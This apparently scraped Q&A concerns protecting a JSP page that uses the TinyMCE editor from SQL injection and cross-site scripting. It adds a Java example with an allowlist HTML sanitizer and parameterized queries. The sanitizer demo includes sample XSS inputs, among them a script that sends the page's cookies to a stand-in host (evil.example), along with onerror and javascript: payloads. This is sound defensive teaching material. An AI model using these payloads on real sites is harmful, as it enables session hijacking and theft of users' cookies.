Reputation: 5519
We are planning to use TinyMce in a JSP.
We have a standard security filter which keeps track of input data from forms. It identifies insecure code input attempting any intrusions/cross-site scripting.
My questions are as follows:
(I found one link in StackOverflow mentioning a PHP library, but I was looking for something in Java.)
Upvotes: 5
Views: 5414
Reputation: 156654
SQL injection should be something you worry about in your data layer, rather than your front-end. If you're using the proper techniques to prevent SQL injection when you insert the data into your database, you shouldn't have to worry about doing anything with TinyMCE, or any other part of your front-end code.
Cross-site scripting attacks, on the other hand, are a different story. The best strategy for preventing cross-site scripting attacks is generally to HTML-encode everything that you don't produce in your front-end layer. However, since you're using TinyMCE, I'm guessing that you want to allow user-generated HTML to appear on your site. In that case, you'll want to look up "HTML sanitizing."
Here are a couple of links to start you off:
You can decide whether you prefer to sanitize the HTML before saving it to the database, after retrieving it from the database, or both. There are pros and cons to each strategy.
Upvotes: 9
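The two points of the answer above (parameterize in the data layer, sanitize the rich-text HTML against an allowlist) in one Java class, as an added example that is not part of the original question or answer. It assumes the OWASP Java HTML Sanitizer (`org.owasp.html`) and a JDBC `Connection` are available; the table, column and method names (`posts`, `savePost`, `RichTextStorage`) are made up for the illustration, and the submitted HTML is a constructed sample of what could be POSTed past TinyMCE's client-side filtering.

```java
// Added example, not code from the original page. Assumes the OWASP Java HTML
// Sanitizer (artifact com.googlecode.owasp-java-html-sanitizer) and JDBC on the classpath.
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;

public final class RichTextStorage {

    // Allowlist policy: the subset of TinyMCE output we are willing to keep.
    // Anything not listed here (script, style, iframe, event-handler
    // attributes such as onerror, javascript: URLs, ...) is dropped.
    private static final PolicyFactory POLICY = new HtmlPolicyBuilder()
            .allowElements("p", "br", "ul", "ol", "li", "blockquote",
                           "h1", "h2", "h3", "b", "strong", "i", "em", "u")
            .allowElements("a")
            .allowAttributes("href").onElements("a")
            .allowStandardUrlProtocols()      // http, https, mailto; no javascript:
            .requireRelNofollowOnLinks()
            .toFactory();

    // Sanitize-on-save variant from the answer: the stored body is already safe
    // to emit unescaped in the JSP. Sanitizing again on output costs little and
    // protects rows written before the policy existed.
    public static String sanitize(String untrustedHtml) {
        return POLICY.sanitize(untrustedHtml);
    }

    // Data layer: values are bound as parameters, never concatenated into the
    // SQL text, so quotes or comment markers inside the HTML cannot change the
    // statement. This is where SQL injection is handled, not in the editor.
    public static void savePost(Connection conn, int authorId, String title,
                                String untrustedHtml) throws SQLException {
        String body = sanitize(untrustedHtml);
        String sql = "INSERT INTO posts (author_id, title, body) VALUES (?, ?, ?)";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setInt(1, authorId);
            ps.setString(2, title);   // plain-text field: encode on output in the JSP
            ps.setString(3, body);    // rich-text field: sanitized above
            ps.executeUpdate();
        }
    }

    public static void main(String[] args) {
        // Constructed sample: TinyMCE's own filtering runs in the browser, so an
        // attacker can submit whatever they like in the underlying textarea.
        String submitted = "<p>Hello <b>world</b></p>"
                + "<script>document.location='http://evil.example/?c='+document.cookie</script>"
                + "<img src=x onerror=\"alert(1)\">"
                + "<a href=\"javascript:alert(1)\">click</a>"
                + "<a href=\"https://example.org\">ok</a>";
        System.out.println(sanitize(submitted));
    }
}
```

Keep the policy as small as the editor configuration needs: every element or attribute you allow is something the sanitizer must reason about, and `style` attributes and `<iframe>` in particular are easy to get wrong. Fields that are not rich text (the title above) should still go through the usual output encoding in the JSP rather than through the sanitizer, which is the "HTML-encode everything else" half of the answer.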